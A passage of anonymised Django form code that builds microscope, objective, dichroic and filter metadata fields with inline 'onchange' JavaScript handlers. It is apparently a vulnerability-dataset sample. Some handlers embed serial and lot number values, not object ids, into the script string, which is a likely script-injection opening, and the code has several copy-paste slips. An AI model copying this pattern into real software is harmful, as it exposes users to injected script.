self.fields["mode"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "mode", VAR_7=True
)
}
),
initial=VAR_37.getMode().value,
required=False,
)
else:
self.fields["mode"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["modes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_37.id, "mode", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["mode"])
except Exception:
self.fields["mode"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["mode"])
try:
if VAR_37.pockelCellSetting is not None:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
initial=VAR_37.pockelCellSetting,
label="Pockel cell",
required=False,
)
else:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_37.id, "name"),
}
),
label="Pockel cell",
required=False,
)
FUNC_1(self.fields["pockelCellSetting"])
except Exception:
self.fields["pockelCellSetting"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel cell",
required=False,
)
FUNC_1(self.fields["pockelCellSetting"])
self.fields.keyOrder = [
"name",
"excitationWave",
"emissionWave",
"ndFilter",
"pinHoleSize",
"fluor",
"illumination",
"contrastMethod",
"mode",
"pockelCellSetting",
]
class CLASS_13(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_13, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["dichroic"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["dichroic"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["dichroic"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "model"
),
}
),
initial=VAR_12["initial"]["dichroic"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["dichroic"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
initial=VAR_12["initial"]["dichroic"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].serialNumber,
"serialNumber",
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["dichroic"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
initial=VAR_12["initial"]["dichroic"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["dichroic"].lotNumber, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class CLASS_14(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_14, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["microscope"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "model"
),
}
),
initial=VAR_12["initial"]["microscope"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["microscope"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["microscope"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["microscope"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["microscope"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["microscope"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["microscope"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "lotNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["microscope"].getMicroscopeType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "type", VAR_7=True
)
}
),
initial=VAR_12["initial"]["microscope"].getMicroscopeType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["microscopeTypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["microscope"].id, "type", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
]
class CLASS_15(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_15, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["objective"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "model"
),
}
),
initial=VAR_12["initial"]["objective"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["objective"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["objective"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["objective"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "serialNumber"
),
}
),
initial=VAR_12["initial"]["objective"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["objective"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].lotNumber, "lotNumber"
),
}
),
initial=VAR_12["initial"]["objective"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["logicalchannel"]
.getObjective()
.lotNumber,
"lotNumber",
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["objective"].nominalMagnification is not None:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"nominalMagnification",
),
}
),
initial=VAR_12["initial"]["objective"].nominalMagnification,
label="Nominal magnification",
required=False,
)
else:
self.fields["nominalMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"nominalMagnification",
),
}
),
label="Nominal magnification",
required=False,
)
FUNC_1(self.fields["nominalMagnification"])
except Exception:
self.fields["nominalMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Nominal magnification",
required=False,
)
FUNC_1(self.fields["nominalMagnification"])
try:
if VAR_12["initial"]["objective"].calibratedMagnification is not None:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
initial=VAR_12["initial"]["objective"].calibratedMagnification,
label="Calibrated magnification",
required=False,
)
else:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"calibratedMagnification",
),
}
),
label="Calibrated magnification",
required=False,
)
FUNC_1(self.fields["calibratedMagnification"])
except Exception:
self.fields["calibratedMagnification"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Calibrated magnification",
required=False,
)
FUNC_1(self.fields["calibratedMagnification"])
try:
if VAR_12["initial"]["objective"].lensNA is not None:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "lensNA"
),
}
),
initial=VAR_12["initial"]["objective"].lensNA,
label="Lens NA",
required=False,
)
else:
self.fields["lensNA"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "lensNA"
),
}
),
required=False,
)
FUNC_1(self.fields["lensNA"])
except Exception:
self.fields["lensNA"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lens NA",
required=False,
)
FUNC_1(self.fields["lensNA"])
try:
if VAR_12["initial"]["objective"].getImmersion() is not None:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"immersion",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objective"].getImmersion().value,
required=False,
)
else:
self.fields["immersion"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["immersions"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"immersion",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["immersion"])
except Exception:
self.fields["immersion"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["immersion"])
try:
if VAR_12["initial"]["objective"].getCorrection() is not None:
self.fields["correction"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"correction",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objective"].getCorrection().value,
required=False,
)
else:
self.fields["correction"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["corrections"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id,
"correction",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["correction"])
except Exception:
self.fields["correction"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["correction"])
try:
if VAR_12["initial"]["objective"].workingDistance is not None:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "workingDistance"
),
}
),
initial=VAR_12["initial"]["objective"].workingDistance.getValue(),
label=(
"Working distance (%VAR_23)"
% VAR_12["initial"]["objective"].workingDistance.getSymbol()
),
required=False,
)
else:
self.fields["workingDistance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "workingDistance"
),
}
),
label="Working distance",
required=False,
)
FUNC_1(self.fields["workingDistance"])
except Exception:
self.fields["workingDistance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Working distance",
required=False,
)
FUNC_1(self.fields["workingDistance"])
try:
if VAR_12["initial"]["objective"].getIris() is not None:
self.fields["iris"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "iris", VAR_7=True
)
}
),
initial=VAR_12["initial"]["objective"].getIris().value,
required=False,
)
else:
self.fields["iris"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objective"].id, "iris", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["iris"])
except Exception:
self.fields["iris"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["iris"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
]
class CLASS_16(CLASS_15):
VAR_24 = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_16, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["objectiveSettings"].correctionCollar is not None:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
initial=VAR_12["initial"]["objectiveSettings"].correctionCollar,
label="Correction collar",
required=False,
)
else:
self.fields["correctionCollar"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"correctionCollar",
),
}
),
label="Correction collar",
required=False,
)
FUNC_1(self.fields["correctionCollar"])
except Exception:
self.fields["correctionCollar"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Correction collar",
required=False,
)
FUNC_1(self.fields["correctionCollar"])
try:
if VAR_12["initial"]["objectiveSettings"].getMedium() is not None:
self.fields["medium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"medium",
VAR_7=True,
)
}
),
initial=VAR_12["initial"]["objectiveSettings"].getMedium().value,
required=False,
)
else:
self.fields["medium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"medium",
VAR_7=True,
)
}
),
required=False,
)
FUNC_1(self.fields["medium"])
except Exception:
self.fields["medium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["medium"])
try:
if VAR_12["initial"]["objectiveSettings"].refractiveIndex is not None:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
initial=VAR_12["initial"]["objectiveSettings"].refractiveIndex,
label="Refractive index",
required=False,
)
else:
self.fields["refractiveIndex"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["objectiveSettings"].id,
"refractiveIndex",
),
}
),
label="Refractive index",
required=False,
)
FUNC_1(self.fields["refractiveIndex"])
except Exception:
self.fields["refractiveIndex"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Refractive index",
required=False,
)
FUNC_1(self.fields["refractiveIndex"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"nominalMagnification",
"calibratedMagnification",
"lensNA",
"immersion",
"correction",
"workingDistance",
"iris",
"correctionCollar",
"medium",
"refractiveIndex",
]
class CLASS_17(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_17, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["filter"].manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "manufacturer"
),
}
),
initial=VAR_12["initial"]["filter"].manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "manufacturer"
),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_12["initial"]["filter"].model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "model"
),
}
),
initial=VAR_12["initial"]["filter"].model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "model"
),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_12["initial"]["filter"].serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "serialNumber"
),
}
),
initial=VAR_12["initial"]["filter"].serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "serialNumber"
),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_12["initial"]["filter"].lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "lotNumber"
),
}
),
initial=VAR_12["initial"]["filter"].lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "lotNumber"
),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_12["initial"]["filter"].filterWheel is not None:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "filterWheel"
),
}
),
initial=VAR_12["initial"]["filter"].filterWheel,
label="Filter wheel",
required=False,
)
else:
self.fields["filterWheel"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "filterWheel"
),
}
),
label="Filter wheel",
required=False,
)
FUNC_1(self.fields["filterWheel"])
except Exception:
self.fields["filterWheel"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Filter wheel",
required=False,
)
FUNC_1(self.fields["filterWheel"])
try:
if VAR_12["initial"]["filter"].getFilterType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "type", VAR_7=True
)
}
),
initial=VAR_12["initial"]["filter"].getFilterType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "type", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
VAR_38 = VAR_12["initial"]["filter"].getTransmittanceRange()
try:
if VAR_38 is not None and VAR_38.cutIn is not None:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutIn"
),
}
),
initial=VAR_12["initial"]["filter"]
.getTransmittanceRange()
.cutIn.getValue(),
label="Cut in (%VAR_23)" % VAR_38.cutIn.getSymbol(),
required=False,
)
else:
self.fields["cutIn"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutIn"
),
}
),
label="Cut in",
required=False,
)
FUNC_1(self.fields["cutIn"])
except Exception:
self.fields["cutIn"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in",
required=False,
)
FUNC_1(self.fields["cutIn"])
try:
if VAR_38 is not None and VAR_38.cutOut is not None:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
initial=VAR_38.cutOut.getValue(),
label="Cut out (%VAR_23)" % VAR_38.cutOut.getSymbol(),
required=False,
)
else:
self.fields["cutOut"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out",
required=False,
)
FUNC_1(self.fields["cutOut"])
except Exception:
self.fields["cutOut"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out",
required=False,
)
FUNC_1(self.fields["cutOut"])
try:
if VAR_38 is not None and VAR_38.cutInTolerance is not None:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutInTolerance"
),
}
),
initial=VAR_38.cutInTolerance.getValue(),
label=("Cut in tolerance (%VAR_23)" % VAR_38.cutInTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutInTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutInTolerance"
),
}
),
label="Cut in tolerance",
required=False,
)
FUNC_1(self.fields["cutInTolerance"])
except Exception:
self.fields["cutInTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut in tolerance",
required=False,
)
FUNC_1(self.fields["cutInTolerance"])
try:
if VAR_38 is not None and VAR_38.cutOutTolerance is not None:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
initial=VAR_38.cutOutTolerance.getValue(),
label=("Cut out tolerance (%VAR_23)" % VAR_38.cutOutTolerance.getSymbol()),
required=False,
)
else:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "cutOut"
),
}
),
label="Cut out tolerance",
required=False,
)
FUNC_1(self.fields["cutOutTolerance"])
except Exception:
self.fields["cutOutTolerance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Cut out tolerance",
required=False,
)
FUNC_1(self.fields["cutOutTolerance"])
try:
if VAR_12["initial"]["filter"].transmittanceRange is not None:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
